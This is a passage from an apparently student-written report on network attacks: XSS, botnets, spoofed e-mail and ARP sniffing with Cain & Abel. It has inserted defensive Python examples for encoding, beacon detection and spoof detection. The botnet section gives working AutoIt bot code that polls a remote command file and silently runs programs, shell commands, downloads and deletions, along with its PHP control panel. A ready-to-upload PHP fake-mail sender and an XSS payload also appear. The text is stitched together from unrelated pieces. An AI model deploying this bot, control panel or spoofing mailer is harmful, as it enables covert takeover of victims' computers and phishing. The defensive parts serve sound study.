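The reflection just described (index.php?page=<script...</script>) and the fix it calls for, as an added example in Python rather than code from the report: the parameter echoed raw versus the same parameter passed through output encoding, plus the "view source" check from the text turned into a function. The URL and payload are constructed for the example.

```python
import html
from urllib.parse import parse_qs, quote, urlsplit

PAYLOAD = "<script>alert('XSS')</script>"

def page_param_from_url(url):
    """Extract the 'page' query parameter the way the server sees it."""
    return parse_qs(urlsplit(url).query).get("page", [""])[0]

# Vulnerable: the parameter is echoed into the HTML unchanged, so a payload
# typed into the address bar comes back as markup and the browser runs it.
def render_vulnerable(page_param):
    return "<html><body><h1>Page: " + page_param + "</h1></body></html>"

# Fixed: output encoding. '<', '>', '&' and quotes become entities, so the
# payload is displayed as text. quote=True matters when the value lands inside
# an attribute such as value="...".
def render_safe(page_param):
    return "<html><body><h1>Page: " + html.escape(page_param, quote=True) + "</h1></body></html>"

# The "view source" check described above: the payload appears verbatim.
def reflects_unescaped(response_html, payload=PAYLOAD):
    return payload in response_html

def demo():
    # Constructed URL in the form index.php?page=<script...
    url = "http://doannguyennganh.com/index.php?page=" + quote(PAYLOAD, safe="")
    param = page_param_from_url(url)
    return {
        "param_round_trip": param == PAYLOAD,
        "vulnerable_reflects": reflects_unescaped(render_vulnerable(param)),
        "safe_reflects": reflects_unescaped(render_safe(param)),
        "safe_output": render_safe(param),
    }

if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Encoding at output time is the control that closes the flaw regardless of where the value came from; marking the session cookie HttpOnly limits what a script that does get through can read, but does not prevent the injected login-capture described in the attack scenario.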
2.5. Botnet
2.5.1. About botnets and how they spread
A botnet is a network of hundreds or thousands of computers whose control has been taken over (zombies), used by a hacker to carry out DDoS attacks, send spam or install adware.
Tools are used to spread a virus to the victims and take control of them. Botnets are a great help in denial-of-service attacks.
Well-known botnets include Mariposa and Zeus.
Code:
#include <Process.au3>   ; provides _RunDos()
; Bot client (AutoIt). It polls a direc.txt file on the control panel's host once a
; second, reads the single command line in it and executes it.
; $txt must hold the URL of that direc.txt; the URL is not given in the original.
Global $txt = ""
Global $con = ""

While 1
    GetDr()
    ExCmd()
    Sleep(1000)
WEnd

Func GetDr()
    ; Download and read the command line
    InetGet($txt, @WindowsDir & "\direc.txt", 1, 0)
    $fp = FileOpen(@WindowsDir & "\direc.txt", 0)
    $con = FileReadLine($fp)
    FileClose($fp)
    FileDelete(@WindowsDir & "\direc.txt")
EndFunc

Func ExCmd()
    ; Parse and execute the command ($cmd[0] holds the number of parts)
    If StringInStr($con, "RUN@", 2) Then ; run a program: RUN@path[@SHOW]
        $cmd = StringSplit($con, "@")
        If StringInStr($con, "@SHOW", 2) Then
            Run($cmd[2])
        Else
            Run($cmd[2], "", @SW_HIDE)
        EndIf
        Sleep(7000)
    ElseIf StringInStr($con, "DEL@", 2) Then ; delete a file: DEL@path
        $cmd = StringSplit($con, "@")
        FileDelete($cmd[2])
        Sleep(7000)
    ElseIf StringInStr($con, "LOAD@", 2) Then ; download a file: LOAD@URL@PATH
        $cmd = StringSplit($con, "@")
        InetGet($cmd[2], $cmd[3], 0, 1)
        Sleep(7000)
    ElseIf StringInStr($con, "KILL@", 2) Then ; kill a process: KILL@name
        $cmd = StringSplit($con, "@")
        Run("TASKKILL /F /IM " & $cmd[2] & ".exe", "", @SW_HIDE)
        Sleep(7000)
    ElseIf StringInStr($con, "DOS@", 2) Then ; run a DOS command hidden from the user: DOS@command
        $cmd = StringSplit($con, "@")
        $rc = _RunDos($cmd[2])
        Sleep(7000)
    ElseIf StringInStr($con, "MSGBOX@", 2) Then ; show a message: MSGBOX@flag@title@text@timeout
        $cmd = StringSplit($con, "@")
        MsgBox($cmd[2], $cmd[3], $cmd[4], $cmd[5])
        Sleep(7000)
    ElseIf StringInStr($con, "EXIT@", 2) Then ; exit the program
        Exit
    EndIf
EndFunc
Code:
<?php
// Control panel: writes the submitted command into direc.txt, which the bot polls.
$cmd = isset($_POST['cmd']) ? $_POST['cmd'] : '';
if ($cmd !== '') {
    $fp = fopen('direc.txt', 'w');
    fwrite($fp, $cmd);
    fclose($fp);
}
?>
<html>
<head>
<title>Botnet control panel</title>
</head>
<body style='color:#00FF00; background-color: black'>
<center>
<br>
<form action="#" method="POST">
<input type="text" name="cmd" size="80">
<input type="submit" value="Ok">
</form>
<br>
<?php echo htmlspecialchars($cmd); ?>
<br/>
<br/>
<br/>RUN@path_file<br/>
DEL@path_file<br/>
KILL@process_name<br/>
LOAD@URL@PATH<br/>
DOS@command<br/>
MSGBOX@flag@title@text@timeout<br/>
</center>
</body>
</html>
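A detector for the polling behaviour of the bot above, added here as an example and not part of the report: the bot's loop fetches direc.txt once a second, and that regularity is visible in the web server's access log as a beacon. The log lines below are constructed in Apache common log format; the client addresses, the interval statistics and the thresholds are assumptions for the example.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache common log format; only the fields the detector needs are captured.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) \S+')

def parse_clf(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status = m.groups()
    t = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": ip, "time": t.timestamp(), "method": method, "path": path, "status": int(status)}

# Constructed access log: a bot polling /direc.txt once a second (the bot's
# Sleep(1000) loop) interleaved with an ordinary visitor's irregular requests.
def constructed_log():
    base = datetime(2011, 10, 10, 13, 55, 36, tzinfo=timezone(timedelta(hours=7)))
    fmt = "%d/%b/%Y:%H:%M:%S %z"
    lines = []
    for i in range(12):
        t = (base + timedelta(seconds=i)).strftime(fmt)
        lines.append('203.0.113.5 - - [%s] "GET /direc.txt HTTP/1.1" 200 14 "-" "-"' % t)
    visits = ((0, "/index.php"), (7, "/index.php"), (9, "/about.php"), (30, "/index.php"), (31, "/contact.php"))
    for i, path in visits:
        t = (base + timedelta(seconds=i)).strftime(fmt)
        lines.append('198.51.100.9 - - [%s] "GET %s HTTP/1.1" 200 5120 "-" "Mozilla/5.0"' % (t, path))
    return lines

# A beacon is a (client, path) pair hit at least `min_hits` times with nearly
# constant spacing: the coefficient of variation of the gaps is below `max_cv`.
def beacon_candidates(lines, min_hits=10, max_cv=0.2):
    series = defaultdict(list)
    for line in lines:
        rec = parse_clf(line)
        if rec:
            series[(rec["ip"], rec["path"])].append(rec["time"])
    found = []
    for (ip, path), times in series.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_cv:
            found.append({"client": ip, "path": path, "hits": len(times), "period_s": round(mean, 2)})
    return found

if __name__ == "__main__":
    for candidate in beacon_candidates(constructed_log()):
        print(candidate)
```

On a real log the same check catches any agent that polls its control file on a timer; adding jitter to the bot's sleep raises the coefficient of variation, which is why max_cv is a parameter rather than a fixed constant.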
Code:
<!-- index.php: the form posts to sendmail.php. The opening of the form and the
     rows above "Subject" are missing from the source; they are reconstructed
     from the fields sendmail.php reads (emaillist, from, name). -->
<form action="sendmail.php" method="post">
<table><tbody>
<tr>
<td>To (one address per line):</td>
<td><textarea cols="30" rows="5" name="emaillist"></textarea></td>
</tr>
<tr>
<td>From address:</td>
<td><input name="from" type="text" /></td>
</tr>
<tr>
<td>From name:</td>
<td><input name="name" type="text" /></td>
</tr>
<tr>
<td>Subject :</td>
<td><input name="subject" type="text" />Title</td>
</tr>
<tr>
<td>Message :</td>
<td><textarea cols="30" rows="10" name="message">Content</textarea></td>
</tr>
<tr>
<td></td>
<td><input type="submit" value="Send" /></td>
</tr>
</tbody></table>
</form>
The sendmail.php page:
Code:
<html>
<head>
<title>.:: Fake Mail :: doanchuyennganh.com :: nguyenanhduc.dtu@gmail.com ::.</title>
</head>
<body>
<?php
// Sends one message per address in emaillist with the From and Reply-To the
// sender typed; that is what makes the mail "fake": the From header is whatever
// was entered, not a verified address.
$emaillist = $_POST['emaillist'];
$allemails = preg_split("/\r?\n/", $emaillist);   // split() was removed in PHP 7
$from    = $_POST['from'];
$name    = $_POST['name'];
$subject = $_POST['subject'];
$message = $_POST['message'];
$ret = true;
foreach ($allemails as $to) {
    $to = trim($to);
    if ($to === '') continue;
    $headers = "From: $name <$from>\r\n" .
               "Reply-To: $from\r\n";
    // keep a failure from any recipient instead of only the last result
    $ret = mail($to, $subject, $message, $headers) && $ret;
}
if ($ret)
    echo "<br /> Mail sent Successfully";
else
    echo "<br /> Unable to Send mail";
?>
<br><a href="/">Go Back</a>
</body>
</html>
Then upload the two pages to a host, open index.php and send the fake mail.
Drawback: the hacker has to know the victim's e-mail address.
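Both sides of the fake-mail technique above, as an added example that is not code from the report: a sender that builds the same five fields sendmail.php reads but rejects CR/LF in header values (the PHP version concatenates them raw, so a line break in a field would smuggle extra headers into the message), and a receiver-side check for the signs that a visible From was chosen by the sender. The inbound message, its addresses and its Authentication-Results line are constructed for the example.

```python
from email import message_from_string
from email.message import EmailMessage
from email.utils import parseaddr

# Sender side: the same five fields sendmail.php reads. Any CR/LF in a header
# field is rejected so the user cannot append headers such as Bcc:.
def build_message(to, from_name, from_addr, subject, body):
    for field in (to, from_name, from_addr, subject):
        if "\r" in field or "\n" in field:
            raise ValueError("header injection attempt rejected")
    msg = EmailMessage()
    msg["To"] = to
    msg["From"] = "%s <%s>" % (from_name, from_addr)   # display-name <addr-spec>
    msg["Reply-To"] = from_addr
    msg["Subject"] = subject
    msg.set_content(body)
    return msg

def _domain(addr):
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""

# Receiver side: indicators that the visible From was chosen by the sender
# rather than belonging to the host that actually handed the mail over.
def spoof_indicators(raw_message):
    msg = message_from_string(raw_message)
    from_addr = parseaddr(msg.get("From", ""))[1]
    return_path = parseaddr(msg.get("Return-Path", ""))[1]
    reply_to = parseaddr(msg.get("Reply-To", ""))[1]
    auth = msg.get("Authentication-Results", "").lower()
    indicators = []
    if return_path and _domain(return_path) != _domain(from_addr):
        indicators.append("return-path-domain-mismatch")
    if reply_to and reply_to.lower() != from_addr.lower():
        indicators.append("reply-to-differs-from-from")
    if "spf=fail" in auth or "dkim=fail" in auth:
        indicators.append("authentication-failed")
    return indicators

# Constructed message as it would arrive from the PHP script on a free host:
# the envelope sender (Return-Path) belongs to the host, the From is whatever
# the attacker typed, and the receiving MX recorded an SPF failure.
CONSTRUCTED_INBOUND = """\
Return-Path: <www-data@free-host.example>
Authentication-Results: mx.example.com; spf=fail smtp.mailfrom=free-host.example
From: Intel Recruiting <hr@intel-careers.example>
Reply-To: attacker@mailbox.example
To: victim@example.com
Subject: Intel recruitment forum

Please log in at the link below.
"""

if __name__ == "__main__":
    print(build_message("victim@example.com", "Sender", "me@example.org", "Hello", "body"))
    print(spoof_indicators(CONSTRUCTED_INBOUND))
```

None of the three indicators is proof on its own (mailing lists and ticket systems legitimately set a different Reply-To), but the combination of a Return-Path from an unrelated host and a failed SPF check is exactly what mail sent through a script on a free host looks like to the receiving server.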
2.6.2. Other scams
Other scams include the phone-number impersonation that everyone knows about by now, or someone impersonating the director and calling the secretary. These require the hacker to know the victim in detail.
2.7. Sniffer
2.7.1. About sniffer attacks
The most popular tool is Cain & Abel, a very powerful eavesdropping tool. We will study sniffing through this tool.
2.7.2. Supporting tools
Ethereal v0.10.14
EtherPeek
EffeTech HTTP Sniffer
Wireshark
CHAPTER 3
DEMO
Below I demonstrate a sniffer attack on a LAN using the sniffer software Cain & Abel v4.9.8. I will not describe the installation of Cain & Abel v4.9.8.
In the top-right pane, click inside the pane so that Add to List (+) appears, then choose Add to List (+).
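Cain & Abel sniffs a switched LAN by ARP poisoning (its APR feature), so the defender's counterpart to the demo is watching the ARP traffic on the segment. The following detector is an added example, not part of the report; the tcpdump-like observation format, the addresses and MACs, and the trusted gateway binding are constructed for the example. It flags an IP claimed by more than one MAC, one MAC claiming several IPs (the poisoner impersonating both ends), replies that no one asked for, and changes to a pinned gateway binding.

```python
import re
from collections import defaultdict

# One observation per ARP packet seen on the LAN, tcpdump-like:
#   "<time> request who-has <ip> tell <ip>"
#   "<time> reply <ip> is-at <mac>"
ARP_REPLY = re.compile(r"^(\d+(?:\.\d+)?) reply (\S+) is-at ([0-9a-f:]{17})$")
ARP_REQUEST = re.compile(r"^(\d+(?:\.\d+)?) request who-has (\S+) tell (\S+)$")

def parse_arp(lines):
    events = []
    for line in lines:
        m = ARP_REPLY.match(line)
        if m:
            events.append(("reply", float(m.group(1)), m.group(2), m.group(3).lower()))
            continue
        m = ARP_REQUEST.match(line)
        if m:
            events.append(("request", float(m.group(1)), m.group(2), m.group(3)))
    return events

# Constructed trace: normal resolution, then a poisoner that claims both the
# gateway (192.168.1.1) and a host (192.168.1.20) with its own MAC and keeps
# re-sending unsolicited replies so the poisoned caches do not expire.
CONSTRUCTED_ARP = [
    "0.00 request who-has 192.168.1.1 tell 192.168.1.20",
    "0.01 reply 192.168.1.1 is-at 00:11:22:33:44:55",
    "0.50 request who-has 192.168.1.20 tell 192.168.1.1",
    "0.51 reply 192.168.1.20 is-at 66:77:88:99:aa:bb",
    "10.00 reply 192.168.1.1 is-at de:ad:be:ef:00:01",
    "10.00 reply 192.168.1.20 is-at de:ad:be:ef:00:01",
    "20.00 reply 192.168.1.1 is-at de:ad:be:ef:00:01",
    "20.00 reply 192.168.1.20 is-at de:ad:be:ef:00:01",
]

def detect_arp_spoof(lines, trusted=None, request_window=2.0):
    trusted = trusted or {}          # ip -> expected mac, e.g. the gateway
    events = parse_arp(lines)
    macs_for_ip = defaultdict(set)
    ips_for_mac = defaultdict(set)
    recent_requests = {}             # ip -> time of the last request for it
    alerts = []
    for kind, ts, ip, other in events:
        if kind == "request":
            recent_requests[ip] = ts
            continue
        mac = other
        if ip in trusted and trusted[ip] != mac:
            alerts.append(("trusted-binding-changed", ip, mac))
        # A reply with no matching request in the window is gratuitous; that is
        # how a poisoner keeps its victims' caches pointed at itself.
        if ip not in recent_requests or ts - recent_requests[ip] > request_window:
            alerts.append(("unsolicited-reply", ip, mac))
        macs_for_ip[ip].add(mac)
        ips_for_mac[mac].add(ip)
    for ip, macs in macs_for_ip.items():
        if len(macs) > 1:
            alerts.append(("ip-claimed-by-multiple-macs", ip, ",".join(sorted(macs))))
    for mac, ips in ips_for_mac.items():
        if len(ips) > 1:
            alerts.append(("mac-claims-multiple-ips", mac, ",".join(sorted(ips))))
    return alerts

if __name__ == "__main__":
    for alert in detect_arp_spoof(CONSTRUCTED_ARP, trusted={"192.168.1.1": "00:11:22:33:44:55"}):
        print(alert)
```

The pinned-gateway check is the one worth deploying first: a static ARP entry for the gateway on the hosts, or dynamic ARP inspection on the switch, removes the attack rather than merely detecting it.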
CONCLUSION
1. What was achieved
Through carrying out this specialised project, the first thing I achieved was a basic understanding of the principles and methods of the attacks we see every day on the network, and a basic understanding of the methods for limiting these kinds of attack.
Carrying out this project also showed me how important knowledge of information security in networks is, and consolidated the knowledge of network security that I had studied before.
2. Limitations
While working on the project I found many documents that, although they had the same goal, used completely different methods. I tried to study them further, but errors could not be avoided.